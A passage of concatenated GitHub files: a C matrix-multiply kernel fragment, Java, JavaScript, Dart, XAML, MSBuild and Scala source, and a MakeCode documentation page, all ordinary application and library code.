res0_0 += a0*b0;
res1_0 += a0*b1;
res2_0 += a0*b2;
res3_0 += a0*b3;
ptrba = ptrba+1;
ptrbb = ptrbb+4;
}
res0_0 *= alpha;
res1_0 *= alpha;
res2_0 *= alpha;
res3_0 *= alpha;
C0[0] = res0_0;
C1[0] = res1_0;
C2[0] = res2_0;
C3[0] = res3_0;
#if ( defined(LEFT) && defined(TRANSA)) || (!defined(LEFT) && !defined(TRANSA))
temp = bk - off;
#ifdef LEFT
temp -= 1; // number of values in A
#else
temp -= 4; // number of values in B
#endif
ptrba += temp*1;
ptrbb += temp*4;
#endif
#ifdef LEFT
off += 1; // number of values in A
#endif
C0 = C0+1;
C1 = C1+1;
C2 = C2+1;
C3 = C3+1;
}
#if defined(TRMMKERNEL) && !defined(LEFT)
off += 4;
#endif
k = (bk<<2);
bb = bb+k;
i = (ldc<<2);
C = C+i;
}
for (j=0; j<(bn&2); j+=2) // do the Mx2 loops
{
C0 = C;
C1 = C0+ldc;
#if defined(TRMMKERNEL) && defined(LEFT)
off = offset;
#endif
ptrba = ba;
for (i=0; i<bm/4; i+=1) // do blocks of 4x2
{
#if (defined(LEFT) && defined(TRANSA)) || (!defined(LEFT) && !defined(TRANSA))
ptrbb = bb;
#else
ptrba += off*4;
ptrbb = bb + off*2;
#endif
res0_0 = 0;
res0_1 = 0;
res0_2 = 0;
res0_3 = 0;
res1_0 = 0;
res1_1 = 0;
res1_2 = 0;
res1_3 = 0;
#if (defined(LEFT) && !defined(TRANSA)) || (!defined(LEFT) && defined(TRANSA))
temp = bk-off;
#elif defined(LEFT)
temp = off+4; // number of values in A
#else
temp = off+2; // number of values in B
#endif
for (k=0; k<temp; k++)
{
b0 = ptrbb[0];
b1 = ptrbb[1];
a0 = ptrba[0];
res0_0 += a0*b0;
res1_0 += a0*b1;
a1 = ptrba[1];
res0_1 += a1*b0;
res1_1 += a1*b1;
a0 = ptrba[2];
res0_2 += a0*b0;
res1_2 += a0*b1;
a1 = ptrba[3];
res0_3 += a1*b0;
res1_3 += a1*b1;
ptrba = ptrba+4;
ptrbb = ptrbb+2;
}
res0_0 *= alpha;
res0_1 *= alpha;
res0_2 *= alpha;
res0_3 *= alpha;
res1_0 *= alpha;
res1_1 *= alpha;
res1_2 *= alpha;
res1_3 *= alpha;
C0[0] = res0_0;
C0[1] = res0_1;
C0[2] = res0_2;
C0[3] = res0_3;
C1[0] = res1_0;
C1[1] = res1_1;
C1[2] = res1_2;
C1[3] = res1_3;
#if ( defined(LEFT) && defined(TRANSA)) || (!defined(LEFT) && !defined(TRANSA))
temp = bk - off;
#ifdef LEFT
temp -= 4; // number of values in A
#else
temp -= 2; // number of values in B
#endif
ptrba += temp*4;
ptrbb += temp*2;
#endif
#ifdef LEFT
off += 4; // number of values in A
#endif
C0 = C0+4;
C1 = C1+4;
}
if ( bm & 2 ) // do any 2x2 loop
{
#if (defined(LEFT) && defined(TRANSA)) || (!defined(LEFT) && !defined(TRANSA))
ptrbb = bb;
#else
ptrba += off*2;
ptrbb = bb + off*2;
#endif
res0_0 = 0;
res0_1 = 0;
res1_0 = 0;
res1_1 = 0;
#if (defined(LEFT) && !defined(TRANSA)) || (!defined(LEFT) && defined(TRANSA))
temp = bk-off;
#elif defined(LEFT)
temp = off+2; // number of values in A
#else
temp = off+2; // number of values in B
#endif
for (k=0; k<temp; k++)
{
b0 = ptrbb[0];
b1 = ptrbb[1];
a0 = ptrba[0];
res0_0 += a0*b0;
res1_0 += a0*b1;
a1 = ptrba[1];
res0_1 += a1*b0;
res1_1 += a1*b1;
ptrba = ptrba+2;
ptrbb = ptrbb+2;
}
res0_0 *= alpha;
res0_1 *= alpha;
res1_0 *= alpha;
res1_1 *= alpha;
C0[0] = res0_0;
C0[1] = res0_1;
C1[0] = res1_0;
C1[1] = res1_1;
#if ( defined(LEFT) && defined(TRANSA)) || (!defined(LEFT) && !defined(TRANSA))
temp = bk - off;
#ifdef LEFT
temp -= 2; // number of values in A
#else
temp -= 2; // number of values in B
#endif
ptrba += temp*2;
ptrbb += temp*2;
#endif
#ifdef LEFT
off += 2; // number of values in A
#endif
C0 = C0+2;
C1 = C1+2;
}
if ( bm & 1 ) // do any 1x2 loop
{
#if (defined(LEFT) && defined(TRANSA)) || (!defined(LEFT) && !defined(TRANSA))
ptrbb = bb;
#else
ptrba += off*1;
ptrbb = bb + off*2;
#endif
res0_0 = 0;
res1_0 = 0;
#if (defined(LEFT) && !defined(TRANSA)) || (!defined(LEFT) && defined(TRANSA))
temp = bk-off;
#elif defined(LEFT)
temp = off+1; // number of values in A
#else
temp = off+2; // number of values in B
#endif
for (k=0; k<temp; k++)
{
b0 = ptrbb[0];
b1 = ptrbb[1];
a0 = ptrba[0];
res0_0 += a0*b0;
res1_0 += a0*b1;
ptrba = ptrba+1;
ptrbb = ptrbb+2;
}
res0_0 *= alpha;
res1_0 *= alpha;
C0[0] = res0_0;
C1[0] = res1_0;
#if ( defined(LEFT) && defined(TRANSA)) || (!defined(LEFT) && !defined(TRANSA))
temp = bk - off;
#ifdef LEFT
temp -= 1; // number of values in A
#else
temp -= 2; // number of values in B
#endif
ptrba += temp*1;
ptrbb += temp*2;
#endif
#ifdef LEFT
off += 1; // number of values in A
#endif
C0 = C0+1;
C1 = C1+1;
}
#if defined(TRMMKERNEL) && !defined(LEFT)
off += 2;
#endif
k = (bk<<1);
bb = bb+k;
i = (ldc<<1);
C = C+i;
}
for (j=0; j<(bn&1); j+=1) // do the Mx1 loops
{
C0 = C;
#if defined(TRMMKERNEL) && defined(LEFT)
off = offset;
#endif
ptrba = ba;
for (i=0; i<bm/4; i+=1) // do blocks of 4x1 loops
{
#if (defined(LEFT) && defined(TRANSA)) || (!defined(LEFT) && !defined(TRANSA))
ptrbb = bb;
#else
ptrba += off*4;
ptrbb = bb + off*1;
#endif
res0_0 = 0;
res0_1 = 0;
res0_2 = 0;
res0_3 = 0;
#if (defined(LEFT) && !defined(TRANSA)) || (!defined(LEFT) && defined(TRANSA))
temp = bk-off;
#elif defined(LEFT)
temp = off+4; // number of values in A
#else
temp = off+1; // number of values in B
#endif
for (k=0; k<temp; k++)
{
b0 = ptrbb[0];
a0 = ptrba[0];
res0_0 += a0*b0;
a1 = ptrba[1];
res0_1 += a1*b0;
a0 = ptrba[2];
res0_2 += a0*b0;
a1 = ptrba[3];
res0_3 += a1*b0;
ptrba = ptrba+4;
ptrbb = ptrbb+1;
}
res0_0 *= alpha;
res0_1 *= alpha;
res0_2 *= alpha;
res0_3 *= alpha;
C0[0] = res0_0;
C0[1] = res0_1;
C0[2] = res0_2;
C0[3] = res0_3;
#if ( defined(LEFT) && defined(TRANSA)) || (!defined(LEFT) && !defined(TRANSA))
temp = bk - off;
#ifdef LEFT
temp -= 4; // number of values in A
#else
temp -= 1; // number of values in B
#endif
ptrba += temp*4;
ptrbb += temp*1;
#endif
#ifdef LEFT
off += 4; // number of values in A
#endif
C0 = C0+4;
}
if ( bm & 2 ) // do any 2x1 loop
{
#if (defined(LEFT) && defined(TRANSA)) || (!defined(LEFT) && !defined(TRANSA))
ptrbb = bb;
#else
ptrba += off*2;
ptrbb = bb + off*1;
#endif
res0_0 = 0;
res0_1 = 0;
#if (defined(LEFT) && !defined(TRANSA)) || (!defined(LEFT) && defined(TRANSA))
temp = bk-off;
#elif defined(LEFT)
temp = off+2; // number of values in A
#else
temp = off+1; // number of values in B
#endif
for (k=0; k<temp; k++)
{
b0 = ptrbb[0];
a0 = ptrba[0];
res0_0 += a0*b0;
a1 = ptrba[1];
res0_1 += a1*b0;
ptrba = ptrba+2;
ptrbb = ptrbb+1;
}
res0_0 *= alpha;
res0_1 *= alpha;
C0[0] = res0_0;
C0[1] = res0_1;
#if ( defined(LEFT) && defined(TRANSA)) || (!defined(LEFT) && !defined(TRANSA))
temp = bk - off;
#ifdef LEFT
temp -= 2; // number of values in A
#else
temp -= 1; // number of values in B
#endif
ptrba += temp*2;
ptrbb += temp*1;
#endif
#ifdef LEFT
off += 2; // number of values in A
#endif
C0 = C0+2;
}
if ( bm & 1 ) // do any 1x1 loop
{
#if (defined(LEFT) && defined(TRANSA)) || (!defined(LEFT) && !defined(TRANSA))
ptrbb = bb;
#else
ptrba += off*1;
ptrbb = bb + off*1;
#endif
res0_0 = 0;
#if (defined(LEFT) && !defined(TRANSA)) || (!defined(LEFT) && defined(TRANSA))
temp = bk-off;
#elif defined(LEFT)
temp = off+1; // number of values in A
#else
temp = off+1; // number of values in B
#endif
for (k=0; k<temp; k++)
{
b0 = ptrbb[0];
a0 = ptrba[0];
res0_0 += a0*b0;
ptrba = ptrba+1;
ptrbb = ptrbb+1;
}
res0_0 *= alpha;
C0[0] = res0_0;
#if ( defined(LEFT) && defined(TRANSA)) || (!defined(LEFT) && !defined(TRANSA))
temp = bk - off;
#ifdef LEFT
temp -= 1; // number of values in A
#else
temp -= 1; // number of values in B
#endif
ptrba += temp*1;
ptrbb += temp*1;
#endif
#ifdef LEFT
off += 1; // number of values in A
#endif
C0 = C0+1;
}
#if defined(TRMMKERNEL) && !defined(LEFT)
off += 1;
#endif
k = (bk<<0);
bb = bb+k;
C = C+ldc;
}
return 0;
}
| {
"pile_set_name": "Github"
} |
package org.tests.query;
import io.ebean.BaseTestCase;
import io.ebean.Ebean;
import org.tests.model.basic.Customer;
import org.tests.model.basic.ResetBasicData;
import org.junit.Assert;
import org.junit.Test;
import java.util.List;
public class TestQueryPathJoinAndOrder extends BaseTestCase {
@Test
public void test() {
ResetBasicData.reset();
List<Customer> list = Ebean.find(Customer.class).select("id,name, status").fetch("contacts")
.order().asc("id").order().desc("contacts.firstName").setMaxRows(3).findList();
Assert.assertNotNull(list);
// can't really assert that the contacts are batch loaded
// via a secondary query join
}
}
| {
"pile_set_name": "Github"
} |
package com.xrtb.probe;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.concurrent.atomic.LongAdder;
/**
* Probe that records, per exchange, campaign and creative, why the bidder chose not to bid.
* @author Ben M. Faul
*
*/
public class Probe {
public static volatile Map<String, ExchangeProbe> probes;
public static final StringBuilder DEAL_PRICE_ERROR = new StringBuilder("This creative price is 0, with no set deals\n");
public static final StringBuilder PRIVATE_AUCTION_LIMITED = new StringBuilder("This creative price is 0, with no set deals, and this is a private auction\n");
public static final StringBuilder NO_WINNING_DEAL_FOUND = new StringBuilder("Error in finding the winning deal in the bid request\n");
public static final StringBuilder NO_APPLIC_DEAL = new StringBuilder("This creative price is 0, with no matching deals in the bid request, and is a private auction\n");
public static final StringBuilder BID_FLOOR = new StringBuilder("Bid floor greater than bid\n");
public static final StringBuilder BID_CREAT_IS_VIDEO = new StringBuilder("Creative is video, request is not\n");
public static final StringBuilder BID_CREAT_IS_BANNER = new StringBuilder("Creative is banner, request is not\n");
public static final StringBuilder BID_CREAT_IS_NATIVE = new StringBuilder("Creative is native content, request is not\n");
public static final StringBuilder NATIVE_LAYOUT = new StringBuilder("Native ad layouts don't match\n");
public static final StringBuilder NATIVE_TITLE = new StringBuilder("Native ad request wants a title, creative has none\n");
public static final StringBuilder NATIVE_TITLE_LEN = new StringBuilder("Native ad title length is too long\n");
public static final StringBuilder NATIVE_WANTS_IMAGE = new StringBuilder("Native ad request wants an img, creative has none\n");
public static final StringBuilder NATIVE_IMAGEW_MISMATCH = new StringBuilder("Native ad img widths dont match\n");
public static final StringBuilder NATIVE_IMAGEH_MISMATCH = new StringBuilder("Native ad img heights dont match\n");
public static final StringBuilder NATIVE_WANTS_VIDEO = new StringBuilder("Native ad request wants a video, creative has none\n");
public static final StringBuilder NATIVE_AD_TOO_SHORT = new StringBuilder("Native ad video duration is < what request wants\n");
public static final StringBuilder NATIVE_AD_TOO_LONG = new StringBuilder("Native ad video duration is > what request wants\n");
public static final StringBuilder NATIVE_LINEAR_MISMATCH = new StringBuilder("Native ad video linearity doesn't match the ad\n");
public static final StringBuilder NATIVE_AD_PROTOCOL_MISMATCH = new StringBuilder("Native ad video protocol doesn't match the ad\n");
public static final StringBuilder NATIVE_AD_DATUM_MISMATCH = new StringBuilder("Native ad data item mismatch\n");
public static final StringBuilder WH_INTERSTITIAL = new StringBuilder("No width or height specified and campaign is not interstitial\n");
public static final StringBuilder WH_MATCH = new StringBuilder("Creative w or h attributes dont match\n");
public static final StringBuilder VIDEO_LINEARITY = new StringBuilder("Video linearity does not match\n");
public static final StringBuilder VIDEO_TOO_SHORT = new StringBuilder("Video Creative min duration not long enough\n");
public static final StringBuilder VIDEO_TOO_LONG = new StringBuilder("Video Creative max duration too short\n");
public static final StringBuilder VIDEO_PROTOCOL = new StringBuilder("Video Creative protocols don't match\n");
public static final StringBuilder VIDEO_MIME = new StringBuilder("Video Creative mime type mismatch\n");
public static final StringBuilder CREATIVE_MISMATCH = new StringBuilder("Creative mismatch: ");
LongAdder total = new LongAdder();
public Probe() {
probes = new HashMap();
}
public ExchangeProbe add(String exchange) {
ExchangeProbe probe = probes.get(exchange);
if (probe == null) {
probe = new ExchangeProbe(exchange);
probes.put(exchange, probe);
}
return probe;
}
/**
* Reset the probes to 0.
*/
public void reset() {
for (Map.Entry<String, ExchangeProbe> entry : probes.entrySet()) {
entry.getValue().reset();
}
total.reset();
}
public void process(String exchange, String campaign, String creative, StringBuilder br) {
ExchangeProbe probe = probes.get(exchange);
if (probe == null) {
probe = add(exchange);
}
probe.process(campaign, creative, br);
}
public void incrementTotal(String exchange, String campaign) {
ExchangeProbe probe = probes.get(exchange);
if (probe == null) {
probe = add(exchange);
}
probe.incrementTotal(campaign);
total.increment();
}
public void incrementBid(String exchange, String campaign) {
ExchangeProbe probe = probes.get(exchange);
if (probe == null) {
probe = add(exchange);
}
probe.incrementBids(campaign);
}
public void process(String exchange, String campaign, String creative) {
ExchangeProbe probe = probes.get(exchange);
if (probe == null) {
probe = add(exchange);
}
probe.process(campaign, creative);
}
public String report() {
StringBuilder report = new StringBuilder();
for (Map.Entry<String, ExchangeProbe> entry : probes.entrySet()) {
String key = entry.getKey();
report.append(key);
report.append("\n");
report.append(entry.getValue().report());
}
return report.toString();
}
public String reportCsv() {
StringBuilder report = new StringBuilder();
for (Map.Entry<String, ExchangeProbe> entry : probes.entrySet()) {
entry.getValue().reportCsv(report,total.sum());
}
return report.toString();
}
/**
* Return a List of objects that denote the exchange, bids, total, and a list of maps of the campaigns.
* @return List. The list of report maps for the exchanges.
*/
public List<Map<String,Object>> getMap() {
List<Map<String,Object>> list = new ArrayList<Map<String,Object>>();
for (Map.Entry<String, ExchangeProbe> entry : probes.entrySet()) {
Map<String,Object> m = new HashMap<String,Object>();
String key = entry.getKey();
m.put("exchange", key);
m.put("bids", entry.getValue().getBids());
m.put("total", entry.getValue().getTotal());
m.put("campaigns",entry.getValue().getMap());
list.add(m);
}
return list;
}
public String getTable() {
StringBuilder table = new StringBuilder();
table.append("<table border='1'>\n");
for (Map.Entry<String, ExchangeProbe> entry : probes.entrySet()) {
String key = entry.getKey();
table.append("<tr><td>");
table.append(key);
table.append("</td>");
table.append("<td>");
table.append(entry.getValue().getTable());
table.append("</td></tr>\n");
}
table.append("</table>");
return table.toString();
}
}
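/**
* Minimal three-level map: stores and retrieves a value keyed by the triple (k1, k2, k3).
*/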
class KKKV {
Map<Object,Map> K1 = new HashMap();
public KKKV() {
}
public Object get(String k1, String k2, String k3) {
Map<Object,Map> x = K1.get(k1);
if (x == null)
return null;
Map y = x.get(k2);
if (y == null)
return null;
return y.get(k3);
}
public void put(String k1, String k2, String k3, Object v) {
Map<Object,Map> x = K1.get(k1);
if (x == null) {
x = new HashMap();
K1.put(k1, x);
}
Map y = x.get(k2);
if (y == null) {
y = new HashMap();
x.put(k2, y);
}
y.put(k3, v);
}
}
| {
"pile_set_name": "Github"
} |
export default function reducer(state = 0, action) {
switch(action.type) {
case INCREMENT:
return state + 1
case DECREMENT:
return state - 1
default:
return state
}
}
const INCREMENT = 'CONTADOR:INCREMENT'
const DECREMENT = 'CONTADOR:DECREMENT'
export function increment() {
return {
type: INCREMENT
}
}
export function decrement() {
return {
type: DECREMENT
}
}
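// Example (hypothetical) usage with a Redux store:
// import { createStore } from 'redux'
// const store = createStore(reducer)
// store.dispatch(increment()) // state: 0 -> 1
// store.dispatch(decrement()) // state: 1 -> 0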
| {
"pile_set_name": "Github"
} |
# runtime
Get the time in milliseconds since the game was started.
```sig
game.runtime()
```
## Returns
* a [number](/types/number) which is the amount of time in milliseconds since the game started.
## Example #Example
Move a sprite across the screen. When `5` seconds have elapsed, stop the sprite and show the game time.
```blocks
enum SpriteKind {
Player,
Enemy
}
let mySprite: Sprite = null
mySprite = sprites.create(img`
. . . . . 2 2 2 2 2 2 . . . . .
. . 2 2 2 2 2 2 2 2 2 2 2 2 . .
. 2 2 2 2 2 2 2 2 2 2 2 2 2 2 .
. 2 2 2 2 2 2 2 2 2 2 2 2 2 2 .
. 2 2 2 2 2 2 2 2 2 2 2 2 2 2 .
2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2
2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2
2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2
2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2
2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2
2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2
. 2 2 2 2 2 2 2 2 2 2 2 2 2 2 .
. 2 2 2 2 2 2 2 2 2 2 2 2 2 2 .
. 2 2 2 2 2 2 2 2 2 2 2 2 2 2 .
. . 2 2 2 2 2 2 2 2 2 2 2 2 . .
. . . . . 2 2 2 2 2 2 . . . . .
`, SpriteKind.Player)
mySprite.vx = 10
pause(5000)
mySprite.vx = 0
game.showLongText("Game time = " + game.runtime(), DialogLayout.Bottom)
```
## See also #seealso
[start countdown](/reference/info/start-countdown) | {
"pile_set_name": "Github"
} |
import 'package:firebase_database/firebase_database.dart';
import 'package:flutter/material.dart';
var currentUserEmail;
class ChatMessageListItem extends StatelessWidget {
final DataSnapshot messageSnapshot;
final Animation animation;
ChatMessageListItem({this.messageSnapshot, this.animation});
@override
Widget build(BuildContext context) {
return new SizeTransition(
sizeFactor:
new CurvedAnimation(parent: animation, curve: Curves.decelerate),
child: new Container(
margin: const EdgeInsets.symmetric(vertical: 10.0),
child: new Row(
children: currentUserEmail == messageSnapshot.value['email']
? getSentMessageLayout()
: getReceivedMessageLayout(),
),
),
);
}
List<Widget> getSentMessageLayout() {
return <Widget>[
new Expanded(
child: new Column(
crossAxisAlignment: CrossAxisAlignment.end,
children: <Widget>[
new Text(messageSnapshot.value['senderName'],
style: new TextStyle(
fontSize: 14.0,
color: Colors.black,
fontWeight: FontWeight.bold)),
new Container(
margin: const EdgeInsets.only(top: 5.0),
child: messageSnapshot.value['imageUrl'] != null
? new Image.network(
messageSnapshot.value['imageUrl'],
width: 250.0,
)
: new Text(messageSnapshot.value['text']),
),
],
),
),
new Column(
crossAxisAlignment: CrossAxisAlignment.end,
children: <Widget>[
new Container(
margin: const EdgeInsets.only(left: 8.0),
child: new CircleAvatar(
backgroundImage:
new NetworkImage(messageSnapshot.value['senderPhotoUrl']),
)),
],
),
];
}
List<Widget> getReceivedMessageLayout() {
return <Widget>[
new Column(
crossAxisAlignment: CrossAxisAlignment.start,
children: <Widget>[
new Container(
margin: const EdgeInsets.only(right: 8.0),
child: new CircleAvatar(
backgroundImage:
new NetworkImage(messageSnapshot.value['senderPhotoUrl']),
)),
],
),
new Expanded(
child: new Column(
crossAxisAlignment: CrossAxisAlignment.start,
children: <Widget>[
new Text(messageSnapshot.value['senderName'],
style: new TextStyle(
fontSize: 14.0,
color: Colors.black,
fontWeight: FontWeight.bold)),
new Container(
margin: const EdgeInsets.only(top: 5.0),
child: messageSnapshot.value['imageUrl'] != null
? new Image.network(
messageSnapshot.value['imageUrl'],
width: 250.0,
)
: new Text(messageSnapshot.value['text']),
),
],
),
),
];
}
}
| {
"pile_set_name": "Github"
} |
<UserControl
x:Class="Quarrel.Controls.FFTVisualizer"
xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
xmlns:local="using:Quarrel.Controls"
xmlns:d="http://schemas.microsoft.com/expression/blend/2008"
xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"
xmlns:canvas="using:Microsoft.Graphics.Canvas.UI.Xaml"
mc:Ignorable="d"
d:DesignHeight="300"
d:DesignWidth="400">
<Grid>
<canvas:CanvasAnimatedControl Draw="CanvasAnimatedControl_Draw" SizeChanged="CanvasAnimatedControl_SizeChanged"/>
</Grid>
</UserControl>
| {
"pile_set_name": "Github"
} |
activeProfiles=
eclipse.preferences.version=1
fullBuildGoals=process-test-resources
resolveWorkspaceProjects=true
resourceFilterGoals=process-resources resources\:testResources
skipCompilerPlugin=true
version=1
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="14.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">x86</Platform>
<ProjectGuid>{CA63949B-E3AF-4979-BDA4-44DF2C4C53E3}</ProjectGuid>
<OutputType>AppContainerExe</OutputType>
<AppDesignerFolder>Properties</AppDesignerFolder>
<RootNamespace>ColorTestApp.UWP</RootNamespace>
<AssemblyName>ColorTestApp.UWP</AssemblyName>
<DefaultLanguage>en-US</DefaultLanguage>
<TargetPlatformIdentifier>UAP</TargetPlatformIdentifier>
<TargetPlatformVersion>10.0.14393.0</TargetPlatformVersion>
<TargetPlatformMinVersion>10.0.10240.0</TargetPlatformMinVersion>
<MinimumVisualStudioVersion>14</MinimumVisualStudioVersion>
<EnableDotNetNativeCompatibleProfile>true</EnableDotNetNativeCompatibleProfile>
<FileAlignment>512</FileAlignment>
<ProjectTypeGuids>{A5A43C5B-DE2A-4C0C-9213-0A381AF9435A};{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}</ProjectTypeGuids>
<PackageCertificateKeyFile>Windows_TemporaryKey.pfx</PackageCertificateKeyFile>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|ARM'">
<DebugSymbols>true</DebugSymbols>
<OutputPath>bin\ARM\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE;NETFX_CORE;WINDOWS_UWP</DefineConstants>
<NoWarn>;2008</NoWarn>
<DebugType>full</DebugType>
<PlatformTarget>ARM</PlatformTarget>
<UseVSHostingProcess>false</UseVSHostingProcess>
<ErrorReport>prompt</ErrorReport>
<Prefer32Bit>true</Prefer32Bit>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Release|ARM'">
<OutputPath>bin\ARM\Release\</OutputPath>
<DefineConstants>TRACE;NETFX_CORE;WINDOWS_UWP</DefineConstants>
<Optimize>true</Optimize>
<NoWarn>;2008</NoWarn>
<DebugType>pdbonly</DebugType>
<PlatformTarget>ARM</PlatformTarget>
<UseVSHostingProcess>false</UseVSHostingProcess>
<ErrorReport>prompt</ErrorReport>
<Prefer32Bit>true</Prefer32Bit>
<UseDotNetNativeToolchain>true</UseDotNetNativeToolchain>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|x64'">
<DebugSymbols>true</DebugSymbols>
<OutputPath>bin\x64\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE;NETFX_CORE;WINDOWS_UWP</DefineConstants>
<NoWarn>;2008</NoWarn>
<DebugType>full</DebugType>
<PlatformTarget>x64</PlatformTarget>
<UseVSHostingProcess>false</UseVSHostingProcess>
<ErrorReport>prompt</ErrorReport>
<Prefer32Bit>true</Prefer32Bit>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Release|x64'">
<OutputPath>bin\x64\Release\</OutputPath>
<DefineConstants>TRACE;NETFX_CORE;WINDOWS_UWP</DefineConstants>
<Optimize>true</Optimize>
<NoWarn>;2008</NoWarn>
<DebugType>pdbonly</DebugType>
<PlatformTarget>x64</PlatformTarget>
<UseVSHostingProcess>false</UseVSHostingProcess>
<ErrorReport>prompt</ErrorReport>
<Prefer32Bit>true</Prefer32Bit>
<UseDotNetNativeToolchain>true</UseDotNetNativeToolchain>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|x86'">
<DebugSymbols>true</DebugSymbols>
<OutputPath>bin\x86\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE;NETFX_CORE;WINDOWS_UWP</DefineConstants>
<NoWarn>;2008</NoWarn>
<DebugType>full</DebugType>
<PlatformTarget>x86</PlatformTarget>
<UseVSHostingProcess>false</UseVSHostingProcess>
<ErrorReport>prompt</ErrorReport>
<Prefer32Bit>true</Prefer32Bit>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Release|x86'">
<OutputPath>bin\x86\Release\</OutputPath>
<DefineConstants>TRACE;NETFX_CORE;WINDOWS_UWP</DefineConstants>
<Optimize>true</Optimize>
<NoWarn>;2008</NoWarn>
<DebugType>pdbonly</DebugType>
<PlatformTarget>x86</PlatformTarget>
<UseVSHostingProcess>false</UseVSHostingProcess>
<ErrorReport>prompt</ErrorReport>
<Prefer32Bit>true</Prefer32Bit>
<UseDotNetNativeToolchain>true</UseDotNetNativeToolchain>
</PropertyGroup>
<ItemGroup>
<!-- A reference to the entire .Net Framework and Windows SDK are automatically included -->
<None Include="project.json" />
</ItemGroup>
<ItemGroup>
<Compile Include="App.xaml.cs">
<DependentUpon>App.xaml</DependentUpon>
</Compile>
<Compile Include="MainPage.xaml.cs">
<DependentUpon>MainPage.xaml</DependentUpon>
</Compile>
<Compile Include="Properties\AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<AppxManifest Include="Package.appxmanifest">
<SubType>Designer</SubType>
</AppxManifest>
<None Include="Windows_TemporaryKey.pfx" />
</ItemGroup>
<ItemGroup>
<Content Include="Properties\Default.rd.xml" />
<Content Include="Assets\LockScreenLogo.scale-200.png" />
<Content Include="Assets\SplashScreen.scale-200.png" />
<Content Include="Assets\Square150x150Logo.scale-200.png" />
<Content Include="Assets\Square44x44Logo.scale-200.png" />
<Content Include="Assets\Square44x44Logo.targetsize-24_altform-unplated.png" />
<Content Include="Assets\StoreLogo.png" />
<Content Include="Assets\Wide310x150Logo.scale-200.png" />
</ItemGroup>
<ItemGroup>
<ApplicationDefinition Include="App.xaml">
<Generator>MSBuild:Compile</Generator>
<SubType>Designer</SubType>
</ApplicationDefinition>
<Page Include="MainPage.xaml">
<Generator>MSBuild:Compile</Generator>
<SubType>Designer</SubType>
</Page>
</ItemGroup>
<ItemGroup>
<ProjectReference Include="..\..\ColorThief.Forms.UWP\ColorThief.Forms.UWP.csproj">
<Project>{e024472b-2c3b-4aac-a271-10c24787ad73}</Project>
<Name>ColorThief.Forms.UWP</Name>
</ProjectReference>
</ItemGroup>
<PropertyGroup Condition=" '$(VisualStudioVersion)' == '' or '$(VisualStudioVersion)' < '14.0' ">
<VisualStudioVersion>14.0</VisualStudioVersion>
</PropertyGroup>
<Import Project="..\ColorTestApp\ColorTestApp.projitems" Label="Shared" Condition="Exists('..\ColorTestApp\ColorTestApp.projitems')" />
<Import Project="$(MSBuildExtensionsPath)\Microsoft\WindowsXaml\v$(VisualStudioVersion)\Microsoft.Windows.UI.Xaml.CSharp.targets" />
<!-- To modify your build process, add your task inside one of the targets below and uncomment it.
Other similar extension points exist, see Microsoft.Common.targets.
<Target Name="BeforeBuild">
</Target>
<Target Name="AfterBuild">
</Target>
-->
</Project> | {
"pile_set_name": "Github"
} |
package jsmessages
import play.api.i18n.Messages
import play.api.libs.json.{JsValue, Json, Writes}
import play.twirl.api.JavaScript
import scala.collection.compat._
/**
* Generate a JavaScript function computing localized messages of a Play application.
*
* Typical usage (from within a Play controller):
*
* {{{
* val jsMessages: JsMessages = ???
*
* val messages = Action { implicit request =>
* Ok(jsMessages(Some("window.Messages")))
* }
* }}}
*
* Then on client-side:
*
* {{{
* console.log(Messages("greeting", "Julien")); // prints "Hello, Julien!"
* }}}
*
* See [[JsMessagesFactory]] to know how to get a `JsMessages` instance.
*
* @param allMessagesData All the messages of the application, as a map of (lang -> map(key -> message pattern)). As it
* is the case in Play, JsMessages assumes that “default” messages are indexed by the `"default"`
* and `"default.play"` language codes.
*/
class JsMessages(allMessagesData: Map[String, Map[String, String]]) {
// Message patterns escape literal single quotes by doubling them (''); here we unescape them because we don’t support using quotes to escape format elements
// TODO Also remove subformats
private val allMessagesUnescaped: Map[String, Map[String, String]] =
allMessagesData.view.mapValues(_.view.mapValues(_.replace("''", "'")).toMap).toMap
/**
* Messages for each available lang of the application.
*
* The message corresponding to a given key is found by searching in the
* following locations, in order: the language (e.g. in the `conf/messages.fr-FR` file), the language
* country (e.g. `conf/messages.fr`), the application default messages (`conf/messages`) and the
* Play default messages.
*/
lazy val allMessages: Map[String, Map[String, String]] = for ((lang, msgs) <- allMessagesUnescaped) yield {
lang match {
// Do not merge with "default" if its "default.play"
case "default.play" => lang -> allMessagesUnescaped.getOrElse("default.play", Map.empty)
case _ => lang -> (
allMessagesUnescaped.getOrElse("default.play", Map.empty) ++
allMessagesUnescaped.getOrElse("default", Map.empty) ++
extractCountry(lang).flatMap(country => allMessagesUnescaped.get(country)).getOrElse(Map.empty) ++
msgs
)
}
}
/**
* Same as `allMessages`, but as a JSON value.
*/
